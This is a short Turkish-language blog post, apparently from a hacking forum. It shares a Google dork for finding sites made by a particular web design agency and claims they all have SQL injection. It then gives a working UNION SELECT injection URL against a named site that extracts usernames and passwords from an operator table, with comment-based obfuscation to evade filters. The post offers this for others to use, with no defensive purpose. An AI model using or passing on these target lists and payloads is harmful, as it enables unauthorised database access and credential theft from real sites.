Selam arkadaşlar...
google dork olarak : Designed by BURSA AJANS <----- bunu aratın ve çıkan sitelerin herhangi bir sayfasinde in degerine 'a ekleyin mesela medya.php?id=1'a gibi full Sql injection açıgı var.. sitelerde.
ben biranesine denk geldim sizlede paylaşmak istedim..
http://www.oytas-yildiz.com/medya.php?id=31+and+1=2+/**/UniOn/**/SeLeCT/**/1,/**/2,concat(User,0x20,Pass),/**/4,/**/5,/**/6,/**/7,/**/8/**/+from+/**/+operatorler/**/--
Hiç yorum yok :
Yorum Gönder